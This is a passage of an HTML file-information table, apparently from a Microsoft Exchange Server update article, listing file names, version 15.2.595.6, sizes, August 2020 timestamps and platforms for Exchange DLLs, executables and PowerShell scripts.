applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext_policy.14.0.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,664</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Eext_policy.14.1.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Eext_policy.14.2.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Eext_policy.14.3.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,680</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Eext_policy.14.4.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Eext_policy.15.0.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Eext_policy.15.1.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Eext_policy.15.2.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Eext_policy.15.20.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>13,192</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Eext_policy.8.1.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,680</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Eext_policy.8.2.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Eext_policy.8.3.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Enableinmemorytracing.ps1</td><td>Not applicable</td><td>13,364</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Enable_antimalwarescanning.ps1</td><td>Not applicable</td><td>17,563</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Enable_basicauthtooauthconverterhttpmodule.ps1</td><td>Not applicable</td><td>18,588</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Enable_crossforestconnector.ps1</td><td>Not applicable</td><td>18,598</td><td>12-Aug-2020</td><td>20:43</td><td>Not applicable</td></tr><tr><td>Enable_outlookcertificateauthentication.ps1</td><td>Not applicable</td><td>22,916</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Enable_outsidein.ps1</td><td>Not applicable</td><td>13,647</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Engineupdateserviceinterfaces.dll</td><td>15.2.595.6</td><td>17,800</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Escprint.dll</td><td>15.2.595.6</td><td>20,344</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Ese.dll</td><td>15.2.595.6</td><td>3,741,568</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Eseback2.dll</td><td>15.2.595.6</td><td>350,080</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Esebcli2.dll</td><td>15.2.595.6</td><td>318,336</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Eseperf.dll</td><td>15.2.595.6</td><td>108,936</td><td>12-Aug-2020</td><td>20:44</td><td>x64</td></tr><tr><td>Eseutil.exe</td><td>15.2.595.6</td><td>425,344</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Esevss.dll</td><td>15.2.595.6</td><td>44,424</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Etweseproviderresources.dll</td><td>15.2.595.6</td><td>101,248</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Eventperf.dll</td><td>15.2.595.6</td><td>59,784</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Exchange.depthtwo.types.ps1xml</td><td>Not applicable</td><td>40,109</td><td>12-Aug-2020</td><td>20:45</td><td>Not applicable</td></tr><tr><td>Exchange.format.ps1xml</td><td>Not applicable</td><td>649,694</td><td>12-Aug-2020</td><td>20:45</td><td>Not applicable</td></tr><tr><td>Exchange.partial.types.ps1xml</td><td>Not applicable</td><td>44,339</td><td>12-Aug-2020</td><td>20:46</td><td>Not applicable</td></tr><tr><td>Exchange.ps1</td><td>Not applicable</td><td>20,807</td><td>12-Aug-2020</td><td>20:46</td><td>Not applicable</td></tr><tr><td>Exchange.support.format.ps1xml</td><td>Not applicable</td><td>26,551</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Exchange.types.ps1xml</td><td>Not applicable</td><td>365,149</td><td>12-Aug-2020</td><td>20:45</td><td>Not applicable</td></tr><tr><td>Exchangeudfcommon.dll</td><td>15.2.595.6</td><td>122,752</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Exchangeudfs.dll</td><td>15.2.595.6</td><td>272,776</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Exchmem.dll</td><td>15.2.595.6</td><td>86,400</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Exchsetupmsg.dll</td><td>15.2.595.6</td><td>19,328</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Exdbfailureitemapi.dll</td><td>Not applicable</td><td>27,008</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Exdbmsg.dll</td><td>15.2.595.6</td><td>230,792</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Exeventperfplugin.dll</td><td>15.2.595.6</td><td>25,480</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Exmime.dll</td><td>15.2.595.6</td><td>364,928</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Exportedgeconfig.ps1</td><td>Not applicable</td><td>27,391</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Export_mailpublicfoldersformigration.ps1</td><td>Not applicable</td><td>18,558</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Export_modernpublicfolderstatistics.ps1</td><td>Not applicable</td><td>29,206</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Export_outlookclassification.ps1</td><td>Not applicable</td><td>14,378</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Export_publicfolderstatistics.ps1</td><td>Not applicable</td><td>23,125</td><td>12-Aug-2020</td><td>20:43</td><td>Not applicable</td></tr><tr><td>Export_retentiontags.ps1</td><td>Not applicable</td><td>17,044</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Exppw.dll</td><td>15.2.595.6</td><td>83,328</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Exprfdll.dll</td><td>15.2.595.6</td><td>26,504</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Exrpc32.dll</td><td>15.2.595.6</td><td>2,029,440</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Exrw.dll</td><td>15.2.595.6</td><td>28,032</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Exsetdata.dll</td><td>15.2.595.6</td><td>2,779,528</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Exsetup.exe</td><td>15.2.595.6</td><td>35,200</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Exsetupui.exe</td><td>15.2.595.6</td><td>471,936</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Extrace.dll</td><td>15.2.595.6</td><td>245,120</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Ext_microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>601,480</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Exwatson.dll</td><td>15.2.595.6</td><td>44,928</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Fastioext.dll</td><td>15.2.595.6</td><td>60,288</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Fil06f84122c94c91a0458cad45c22cce20</td><td>Not applicable</td><td>784,631</td><td>12-Aug-2020</td><td>20:43</td><td>Not applicable</td></tr><tr><td>Fil143a7a5d4894478a85eefc89a6539fc8</td><td>Not applicable</td><td>1,909,261</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil19f527f284a0bb584915f9994f4885c3</td><td>Not applicable</td><td>648,793</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil1a9540363a531e7fb18ffe600cffc3ce</td><td>Not applicable</td><td>358,404</td><td>12-Aug-2020</td><td>20:45</td><td>Not applicable</td></tr><tr><td>Fil220d95210c8697448312eee6628c815c</td><td>Not applicable</td><td>303,656</td><td>12-Aug-2020</td><td>20:45</td><td>Not applicable</td></tr><tr><td>Fil2cf5a31e239a45fabea48687373b547c</td><td>Not applicable</td><td>652,724</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil397f0b1f1d7bd44d6e57e496decea2ec</td><td>Not applicable</td><td>784,628</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil3ab126057b34eee68c4fd4b127ff7aee</td><td>Not applicable</td><td>784,604</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil41bb2e5743e3bde4ecb1e07a76c5a7a8</td><td>Not applicable</td><td>149,154</td><td>12-Aug-2020</td><td>20:46</td><td>Not applicable</td></tr><tr><td>Fil51669bfbda26e56e3a43791df94c1e9c</td><td>Not applicable</td><td>9,344</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil558cb84302edfc96e553bcfce2b85286</td><td>Not applicable</td><td>85,258</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil55ce217251b77b97a46e914579fc4c64</td><td>Not applicable</td><td>648,787</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil5a9e78a51a18d05bc36b5e8b822d43a8</td><td>Not applicable</td><td>1,596,145</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil5c7d10e5f1f9ada1e877c9aa087182a9</td><td>Not applicable</td><td>1,596,145</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil6569a92c80a1e14949e4282ae2cc699c</td><td>Not applicable</td><td>1,596,145</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil6a01daba551306a1e55f0bf6894f4d9f</td><td>Not applicable</td><td>648,763</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil8863143ea7cd93a5f197c9fff13686bf</td><td>Not applicable</td><td>648,793</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil8a8c76f225c7205db1000e8864c10038</td><td>Not applicable</td><td>1,596,145</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil8cd999415d36ba78a3ac16a080c47458</td><td>Not applicable</td><td>784,634</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fil97913e630ff02079ce9889505a517ec0</td><td>Not applicable</td><td>1,596,145</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Filaa49badb2892075a28d58d06560f8da2</td><td>Not applicable</td><td>785,658</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Filae28aeed23ccb4b9b80accc2d43175b5</td><td>Not applicable</td><td>648,790</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Filb17f496f9d880a684b5c13f6b02d7203</td><td>Not applicable</td><td>784,634</td><td>12-Aug-2020</td><td>20:43</td><td>Not applicable</td></tr><tr><td>Filb94ca32f2654692263a5be009c0fe4ca</td><td>Not applicable</td><td>2,564,949</td><td>12-Aug-2020</td><td>20:46</td><td>Not applicable</td></tr><tr><td>Filbabdc4808eba0c4f18103f12ae955e5c</td><td>Not applicable</td><td>341,881,192</td><td>12-Aug-2020</td><td>20:46</td><td>Not applicable</td></tr><tr><td>Filc92cf2bf29bed21bd5555163330a3d07</td><td>Not applicable</td><td>652,742</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Filcc478d2a8346db20c4e2dc36f3400628</td><td>Not applicable</td><td>784,634</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Fild26cd6b13cfe2ec2a16703819da6d043</td><td>Not applicable</td><td>1,596,145</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Filf2719f9dc8f7b74df78ad558ad3ee8a6</td><td>Not applicable</td><td>785,640</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Filfa5378dc76359a55ef20cc34f8a23fee</td><td>Not applicable</td><td>1,427,187</td><td>12-Aug-2020</td><td>20:47</td><td>Not applicable</td></tr><tr><td>Filteringconfigurationcommands.ps1</td><td>Not applicable</td><td>18,231</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Filteringpowershell.dll</td><td>15.2.595.6</td><td>223,112</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Filteringpowershell.format.ps1xml</td><td>Not applicable</td><td>29,652</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Filtermodule.dll</td><td>15.2.595.6</td><td>180,104</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Fipexeuperfctrresource.dll</td><td>15.2.595.6</td><td>15,232</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Fipexeventsresource.dll</td><td>15.2.595.6</td><td>44,928</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Fipexperfctrresource.dll</td><td>15.2.595.6</td><td>32,640</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Firewallres.dll</td><td>15.2.595.6</td><td>72,568</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Fms.exe</td><td>15.2.595.6</td><td>1,350,016</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Forefrontactivedirectoryconnector.exe</td><td>15.2.595.6</td><td>110,968</td><td>12-Aug-2020</td><td>20:46</td><td>x64</td></tr><tr><td>Fpsdiag.exe</td><td>15.2.595.6</td><td>18,808</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Fsccachedfilemanagedlocal.dll</td><td>15.2.595.6</td><td>822,152</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Fscconfigsupport.dll</td><td>15.2.595.6</td><td>56,704</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Fscconfigurationserver.exe</td><td>15.2.595.6</td><td>430,976</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Fscconfigurationserverinterfaces.dll</td><td>15.2.595.6</td><td>15,736</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Fsccrypto.dll</td><td>15.2.595.6</td><td>208,768</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Fscipcinterfaceslocal.dll</td><td>15.2.595.6</td><td>28,544</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Fscipclocal.dll</td><td>15.2.595.6</td><td>38,280</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Fscsqmuploader.exe</td><td>15.2.595.6</td><td>453,512</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Getucpool.ps1</td><td>Not applicable</td><td>19,775</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Getvalidengines.ps1</td><td>Not applicable</td><td>13,290</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Get_antispamfilteringreport.ps1</td><td>Not applicable</td><td>15,793</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Get_antispamsclhistogram.ps1</td><td>Not applicable</td><td>14,639</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenderdomains.ps1</td><td>Not applicable</td><td>15,711</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenderips.ps1</td><td>Not applicable</td><td>14,759</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenders.ps1</td><td>Not applicable</td><td>15,482</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Get_antispamtoprblproviders.ps1</td><td>Not applicable</td><td>14,689</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Get_antispamtoprecipients.ps1</td><td>Not applicable</td><td>14,794</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Get_dleligibilitylist.ps1</td><td>Not applicable</td><td>42,336</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Get_exchangeetwtrace.ps1</td><td>Not applicable</td><td>28,947</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Get_publicfoldermailboxsize.ps1</td><td>Not applicable</td><td>15,026</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Get_storetrace.ps1</td><td>Not applicable</td><td>51,887</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Huffman_xpress.dll</td><td>15.2.595.6</td><td>32,648</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Importedgeconfig.ps1</td><td>Not applicable</td><td>77,248</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Import_mailpublicfoldersformigration.ps1</td><td>Not applicable</td><td>29,480</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Import_retentiontags.ps1</td><td>Not applicable</td><td>28,818</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Inproxy.dll</td><td>15.2.595.6</td><td>85,888</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Installwindowscomponent.ps1</td><td>Not applicable</td><td>34,523</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Install_antispamagents.ps1</td><td>Not applicable</td><td>17,913</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Install_odatavirtualdirectory.ps1</td><td>Not applicable</td><td>17,967</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Interop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.595.6</td><td>107,400</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Interop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.595.6</td><td>20,360</td><td>12-Aug-2020</td><td>20:45</td><td>Not applicable</td></tr><tr><td>Interop.certenroll.dll</td><td>15.2.595.6</td><td>142,720</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Interop.licenseinfointerface.dll</td><td>15.2.595.6</td><td>14,216</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Interop.netfw.dll</td><td>15.2.595.6</td><td>34,176</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Interop.plalibrary.dll</td><td>15.2.595.6</td><td>72,576</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Interop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.595.6</td><td>27,008</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Interop.taskscheduler.dll</td><td>15.2.595.6</td><td>46,464</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Interop.wuapilib.dll</td><td>15.2.595.6</td><td>60,808</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Interop.xenroll.dll</td><td>15.2.595.6</td><td>39,808</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Kerbauth.dll</td><td>15.2.595.6</td><td>62,848</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Licenseinfointerface.dll</td><td>15.2.595.6</td><td>643,456</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Lpversioning.xml</td><td>Not applicable</td><td>19,638</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Mailboxdatabasereseedusingspares.ps1</td><td>Not applicable</td><td>31,904</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Managedavailabilitycrimsonmsg.dll</td><td>15.2.595.6</td><td>138,624</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Managedstorediagnosticfunctions.ps1</td><td>Not applicable</td><td>126,237</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Managescheduledtask.ps1</td><td>Not applicable</td><td>36,340</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Manage_metacachedatabase.ps1</td><td>Not applicable</td><td>51,087</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Mce.dll</td><td>15.2.595.6</td><td>1,693,056</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Measure_storeusagestatistics.ps1</td><td>Not applicable</td><td>29,487</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Merge_publicfoldermailbox.ps1</td><td>Not applicable</td><td>22,623</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Microsoft.database.isam.dll</td><td>15.2.595.6</td><td>127,872</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.dkm.proxy.dll</td><td>15.2.595.6</td><td>25,992</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.activemonitoringvariantconfig.dll</td><td>15.2.595.6</td><td>68,488</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.eventlog.dll</td><td>15.2.595.6</td><td>17,800</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.addressbook.service.dll</td><td>15.2.595.6</td><td>233,344</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.addressbook.service.eventlog.dll</td><td>15.2.595.6</td><td>15,752</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.airsyncmsg.dll</td><td>15.2.595.6</td><td>43,392</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.comon.dll</td><td>15.2.595.6</td><td>1,775,992</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.airsync.dll1</td><td>15.2.595.6</td><td>505,224</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.airsynchandler.dll</td><td>15.2.595.6</td><td>76,152</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.anchorservice.dll</td><td>15.2.595.6</td><td>135,560</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.antispam.eventlog.dll</td><td>15.2.595.6</td><td>23,424</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdate.eventlog.dll</td><td>15.2.595.6</td><td>15,752</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdatesvc.exe</td><td>15.2.595.6</td><td>27,008</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.approval.applications.dll</td><td>15.2.595.6</td><td>53,624</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.dll</td><td>15.2.595.6</td><td>925,056</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.eventlog.dll</td><td>15.2.595.6</td><td>25,992</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.assistants.interfaces.dll</td><td>15.2.595.6</td><td>43,400</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.audit.azureclient.dll</td><td>15.2.595.6</td><td>15,240</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditlogsearch.eventlog.dll</td><td>15.2.595.6</td><td>14,720</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.auditlogsearchservicelet.dll</td><td>15.2.595.6</td><td>70,528</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditstoragemonitorservicelet.dll</td><td>15.2.595.6</td><td>94,600</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditstoragemonitorservicelet.eventlog.dll</td><td>15.2.595.6</td><td>13,184</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.authadmin.eventlog.dll</td><td>15.2.595.6</td><td>15,752</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.authadminservicelet.dll</td><td>15.2.595.6</td><td>36,744</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.authservicehostservicelet.dll</td><td>15.2.595.6</td><td>15,744</td><td>12-Aug-2020</td><td>20:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.configuration.dll</td><td>15.2.595.6</td><td>79,752</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.dll</td><td>15.2.595.6</td><td>396,168</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.eventlogs.dll</td><td>15.2.595.6</td><td>21,376</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.autodiscoverv2.dll</td><td>15.2.595.6</td><td>57,208</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.bandwidthmonitorservicelet.dll</td><td>15.2.595.6</td><td>14,728</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.batchservice.dll</td><td>15.2.595.6</td><td>35,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.cabutility.dll</td